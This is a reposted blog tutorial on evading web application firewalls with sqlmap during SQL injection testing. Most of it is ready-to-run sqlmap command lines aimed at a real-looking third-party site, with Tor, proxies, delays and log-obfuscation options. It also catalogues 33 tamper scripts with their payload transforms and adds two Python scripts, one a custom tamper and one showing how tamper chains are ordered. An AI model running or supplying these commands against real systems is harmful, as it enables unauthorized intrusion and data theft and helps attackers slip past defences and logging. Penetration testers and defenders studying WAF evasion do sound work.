(Reprint) Using sqlmap to bypass WAFs during injection testing

http://blog.csdn.net/qq_29277155/article/details/51193071


0x00 Foreword

   Web servers today are commonly protected by a WAF / IPS / IDS. That protection often blocks the SQL injection requests we send, and may even block our host IP, so we have to think about how to bypass it and still reach the injection point. WAF / IPS / IDS vendors have also blacklisted sqlmap's default fingerprints (its User-Agent, for one). Even so, the sqlmap-based bypass techniques introduced below remain practical and effective; each of the following strategies works in particular environments, and whether a bypass actually succeeded has to be judged by carefully reviewing sqlmap's output.

0x01 Confirming the WAF

     First, determine whether the Web server is protected by a WAF / IPS / IDS. This is easy: during the initial scan we can use a dedicated tool to detect a WAF, such as nmap's NSE scripts (e.g. http-waf-detect), or the WAF checks in the WVS (Acunetix) or AppScan scan policies. Here we also introduce using sqlmap itself to detect whether a WAF / IPS / IDS is present:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --threads 10 --identify-waf # preferred

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --threads 10 --check-waf # alternative

Note: these two switches belong to the sqlmap versions current when the post was written. Newer sqlmap releases (1.3 and later) have removed --identify-waf and --check-waf; WAF/IPS detection now runs automatically at the start of every scan (look for the "heuristics detected that the target is protected by some kind of WAF/IPS" message) and can be disabled with --skip-waf.

0x02 Bypassing with sqlmap parameters

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 # use a random real-browser User-Agent; effective especially when the WAF is misconfigured and keys on sqlmap's default User-Agent

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3 # bypass using HTTP Parameter Pollution, effective especially on the ASP.NET / IIS platform

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 # pause between requests to stay below the WAF's rate/trigger threshold (--time-sec raises the delay used for time-based blind tests); this is slow

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=http://211.211.211.211:8080 --proxy-cred=211:985 # inject through a proxy, with proxy credentials

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy # ignore the system proxy settings and connect directly

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session # discard the saved session for this target and re-test from scratch

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex # or --no-cast: change how retrieved data is encoded/cast, altering the characters that appear in the query

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile # imitate a smartphone's User-Agent, targeting the mobile side of the server

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # anonymous injection through Tor

0x03 Bypassing with tamper scripts

1. Usage format:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py # script A, script B (the .py suffix is optional)

2. Overview of the scripts

01 apostrophemask.py # replaces the apostrophe (') with its UTF-8 full-width counterpart; Example: ("1 AND '1'='1") -> "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871"

02 equaltolike.py # MSSQL, SQLite: replaces the equals sign (=) with LIKE; Example: (SELECT * FROM users WHERE id=1) -> SELECT * FROM users WHERE id LIKE 1

03 greatest.py # MySQL: bypasses filtering of '>' by replacing it with GREATEST; Example: ('1 AND A > B') -> '1 AND GREATEST(A,B+1)=A'

04 space2hash.py # MySQL: replaces each space with '#', a random string and a new line; Example: ('1 AND 9227=9227') -> '1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227'

05 apostrophenullencode.py # MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL: bypasses apostrophe filtering by replacing the apostrophe with its illegal double-unicode counterpart (%00%27)

06 halfversionedmorekeywords.py # MySQL < 5.1: adds a MySQL versioned comment (/*!0) before each keyword, for bypassing firewalls when the backend is MySQL

07 space2morehash.py # MySQL >= 5.1.13: replaces each space with '#', a random string and a new line

08 appendnullbyte.py # Microsoft Access: appends an encoded NULL byte to the end of the payload; Example: ('1 AND 1=1') -> '1 AND 1=1%00'

09 ifnull2ifisnull.py # MySQL, SQLite (possibly), SAP MaxDB (possibly): bypasses filtering of IFNULL by replacing 'IFNULL(A, B)' with the equivalent 'IF(ISNULL(A), B, A)'

10 space2mssqlblank.py # MSSQL: replaces each space with a random blank character from a set the MSSQL parser accepts (%01-%09, %0A-%0F)

11 base64encode.py # all DBMSes: Base64-encodes the whole payload; Example: ("1' AND SLEEP(5)#") -> 'MScgQU5EIFNMRUVQKDUpIw=='

12 space2mssqlhash.py # MSSQL, MySQL: replaces each space with '#' followed by a new line; Example: ('1 AND 9227=9227') -> '1%23%0AAND%23%0A9227=9227'

13 modsecurityversioned.py # MySQL: wraps the whole query in a versioned comment (the version number is random); Example: ('1 AND 2>1--') -> '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py # MySQL: replaces each space with a random blank character from a set the MySQL parser accepts (%09, %0A, %0B, %0C, %0D, %A0)

15 between.py # MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0: replaces the greater-than operator (>) with NOT BETWEEN; Example: ('1 AND A > B--') -> '1 AND A NOT BETWEEN 0 AND B--'

16 space2mysqldash.py # MySQL, MSSQL: replaces each space with a dash comment ('--') followed by a new line ('\n'); Example: ('1 AND 9227=9227') -> '1--%0AAND--%0A9227=9227'

17 multiplespaces.py # adds multiple spaces around SQL keywords; Example: ('1 UNION SELECT foobar') -> '1    UNION     SELECT   foobar'

18 space2plus.py # replaces spaces with '+'; Example: ('SELECT id FROM users') -> 'SELECT+id+FROM+users'

19 bluecoat.py # MySQL 5.1, SGOS: replaces the space after an SQL keyword with a valid random blank character, then replaces '=' with LIKE; Example: ('SELECT id FROM users where id = 1') -> 'SELECT%09id FROM users where id LIKE 1'

20 nonrecursivereplacement.py # replaces predefined SQL keywords with representations that survive a non-recursive replacement filter (e.g. .replace("SELECT", "")); Example: ('1 UNION SELECT 2--') -> '1 UNIUNIONON SELESELECTCT 2--'

21 space2randomblank.py # replaces each space with a random blank character from a valid set of alternates (%09, %0A, %0C, %0D)

22 sp_password.py # MSSQL: appends 'sp_password' to the end of the payload so that the statement is automatically obfuscated in the DBMS logs; Example: ('1 AND 9227=9227-- ') -> '1 AND 9227=9227-- sp_password'

23 chardoubleencode.py # double URL-encodes every character of the payload (already-encoded characters are not processed again); Example: ('SELECT FIELD FROM%20TABLE') -> '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

24 unionalltounion.py # replaces UNION ALL SELECT with UNION SELECT; Example: ('-1 UNION ALL SELECT') -> '-1 UNION SELECT'

25 charencode.py # MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0: URL-encodes every character of the payload (already-encoded characters are not processed again); Example: ('SELECT FIELD FROM%20TABLE') -> '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

26 randomcase.py # MSSQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0: randomises the case of each keyword character; Example: ('INSERT') -> 'InsERt'

27 unmagicquotes.py # wide-character bypass of GPC addslashes(): replaces the quote with the multi-byte combination %bf%27 and appends a comment; Example: ("1' AND 1=1") -> '1%bf%27 AND 1=1--%20'

28 randomcomments.py # splits SQL keywords with inline comments (/**/) at random positions; Example: ('INSERT') -> 'I/**/N/**/SERT'

29 charunicodeencode.py # ASP, ASP.NET: unicode-URL-encodes the payload (%uXXXX); Example: ('SELECT') -> '%u0053%u0045%u004C%u0045%u0043%u0054'

30 securesphere.py # appends a specially crafted string; Example: ('1 AND 1=1') -> "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py # MySQL >= 5.1.13: encloses each keyword in a versioned MySQL comment (/*!KEYWORD*/), a comment-based bypass

32 space2comment.py # replaces each space with the comment '/**/'; Example: ('SELECT id FROM users') -> 'SELECT/**/id/**/FROM/**/users'

33 halfversionedmorekeywords.py # MySQL < 5.1: adds a versioned comment before each keyword (the same script as 06)
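When none of the shipped scripts fits the filter in front of you, you write your own. The following is an added example, not part of the original post and not code from the sqlmap project: a minimal custom tamper script in the shape sqlmap expects (a module-level __priority__, a dependencies() hook and a tamper(payload, **kwargs) function), combining the effect of space2comment and randomcase from the list above. The file name commentcase.py and the keyword list are this example's own choices; it is placed in sqlmap's tamper/ directory (a full path works too) and loaded with --tamper=commentcase.

```python
#!/usr/bin/env python
# commentcase.py (hypothetical name): custom sqlmap tamper script.
# Added example; not from the original post or from the sqlmap project.

import random
import re

try:
    # Available when the script is loaded by sqlmap itself.
    from lib.core.enums import PRIORITY
except ImportError:
    # Stand-alone fallback so the module can be imported and tested outside
    # the sqlmap tree; the values mirror sqlmap's lib/core/enums.py.
    class PRIORITY(object):
        LOWEST = -100
        LOWER = -50
        LOW = -10
        NORMAL = 0
        HIGH = 10
        HIGHER = 50
        HIGHEST = 100

# sqlmap runs a chain of tampers from highest to lowest __priority__, so a
# text-level rewrite like this one must sit above the pure encoders
# (charencode, base64encode and friends use PRIORITY.LOWEST and run last).
__priority__ = PRIORITY.LOW

# Keywords whose letter case is randomised. SQL keywords are case-insensitive
# on MySQL, MSSQL, PostgreSQL and Oracle, so this never changes the query.
KEYWORDS = ("SELECT", "UNION", "ALL", "FROM", "WHERE", "AND", "OR",
            "ORDER", "BY", "NULL", "CONCAT", "SLEEP")
_KEYWORD_RE = re.compile(r"\b(%s)\b" % "|".join(KEYWORDS), re.IGNORECASE)

_rng = random.Random()


def dependencies():
    # sqlmap calls this once when the tamper is loaded; shipped scripts use
    # it to print the "only meant to be run against MySQL" style notice.
    pass


def tamper(payload, **kwargs):
    """
    Replaces every space with an inline comment (/**/) and randomises the
    case of common SQL keywords, i.e. space2comment + randomcase in one pass.

    The keyword-argument parameter must literally be named kwargs: sqlmap's
    loader only accepts a function called tamper with that signature.

    >>> tamper("1 AND 9227=9227").upper()
    '1/**/AND/**/9227=9227'
    """
    if not payload:
        return payload

    def _randomcase(match):
        return "".join(c.upper() if _rng.random() < 0.5 else c.lower()
                       for c in match.group(0))

    # Randomise keyword case first, while \b word boundaries still see spaces.
    retVal = _KEYWORD_RE.sub(_randomcase, payload)
    # Then replace the spaces themselves.
    return retVal.replace(" ", "/**/")
```

Run with -v 3 after adding the script to confirm the rewritten payload is what actually goes on the wire; if you chain it with an encoder, the encoder's lower priority guarantees it sees the /**/ sequences and encodes them too.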

 

0x04 Combining parameters and tamper scripts

1. MySQL bypass:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 --delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp --tamper=space2mysqldash.py,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24" --tamper=apostrophemask.py,equaltolike.py

NOTE: these strategies can be combined freely; adjust the combination promptly according to the feedback from the injection attempts (-v 3 shows the payloads actually sent).

2. MSSQL:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24" --tamper=randomcase.py,charencode.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --tamper=unionalltounion.py,base64encode.py

3. MS Access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --hpp --tamper=chardoubleencode.py

4. Oracle:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --user-agent="Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0" --hpp --tamper=charunicodeencode.py,chardoubleencode.py

5. Recommendations:

      Because the WAF may use whitelist rules, the key to choosing a strategy is to judge from the information sqlmap prints at -v 3. Capture the User-Agent of a mainstream browser, add an appropriate delay, and combine these with transformations of the injected characters: letter case, whitespace, string encoding, comments, encryption/encoding and so on.

      Given the parameters and the 32 tamper scripts we normally use in injection, testing all of these different combinations is fairly time-consuming.
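One detail the command lines above do not make visible is the order in which a chain of tamper scripts is applied. The following is an added example, not from the original post and not code from the sqlmap project: it re-implements three of the listed scripts in simplified form (equaltolike, space2comment, charencode) with the same __priority__ values the real ones carry, and applies a chain the way sqlmap does, from highest to lowest priority regardless of the order given to --tamper. The names Tamper, TAMPERS and apply_chain, and the sample payload, are this example's own.

```python
import re
import string
from collections import namedtuple

# Priority constants mirror sqlmap's lib/core/enums.py PRIORITY class.
LOWEST, LOWER, LOW, NORMAL, HIGH, HIGHER, HIGHEST = -100, -50, -10, 0, 10, 50, 100

# A tamper as sqlmap sees it: module name, its __priority__, its tamper() function.
Tamper = namedtuple("Tamper", "name priority func")


def equaltolike(payload):
    """Simplified equaltolike.py: '=' (with surrounding spaces) becomes ' LIKE '."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)


def space2comment(payload):
    """Simplified space2comment.py: spaces outside quoted strings become /**/."""
    out, in_single, in_double = [], False, False
    for ch in payload:
        if ch == "'" and not in_double:
            in_single = not in_single
        elif ch == '"' and not in_single:
            in_double = not in_double
        out.append("/**/" if ch == " " and not (in_single or in_double) else ch)
    return "".join(out)


def charencode(payload):
    """Simplified charencode.py: URL-encode every character, leaving existing %XX alone."""
    out, i = [], 0
    while i < len(payload):
        if (payload[i] == "%" and i + 2 < len(payload)
                and payload[i + 1] in string.hexdigits
                and payload[i + 2] in string.hexdigits):
            out.append(payload[i:i + 3])   # already encoded, keep as is
            i += 3
        else:
            out.append("%%%02X" % ord(payload[i]))
            i += 1
    return "".join(out)


# Same priorities as the shipped scripts: textual rewrites first, encoders last.
TAMPERS = {
    "equaltolike": Tamper("equaltolike", HIGHEST, equaltolike),
    "space2comment": Tamper("space2comment", LOW, space2comment),
    "charencode": Tamper("charencode", LOWEST, charencode),
}


def apply_chain(payload, names, sort_by_priority=True):
    """Apply the named tampers to payload.

    With sort_by_priority=True the chain runs from highest to lowest
    __priority__, which is what sqlmap does for --tamper=a,b,c. With False
    it runs in the listed order, to show why the ordering matters.
    """
    chain = [TAMPERS[n] for n in names]
    if sort_by_priority:
        chain.sort(key=lambda t: t.priority, reverse=True)
    for t in chain:
        payload = t.func(payload)
    return payload


if __name__ == "__main__":
    # Constructed sample payload, of the kind sqlmap sends for a boolean-based test.
    sample = "1 AND id=1"
    listed = ["charencode", "space2comment", "equaltolike"]
    print(apply_chain(sample, listed))
    print(apply_chain(sample, listed, sort_by_priority=False))
```

With the priority ordering, equaltolike first turns the comparison into LIKE, space2comment then replaces the spaces, and charencode finally encodes everything including the /**/ sequences. In the naive listed order charencode runs first, after which there are no literal spaces or equals signs left for the other two scripts to act on, so they silently do nothing; the WAF then sees plain %20 and %3D, exactly what the chain was meant to avoid.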

PS: reproduced from http://blog.csdn.net/qq_29277155/article/details/51193071, thanks to the author for sharing.




Origin: blog.csdn.net/keepxp/article/details/52053412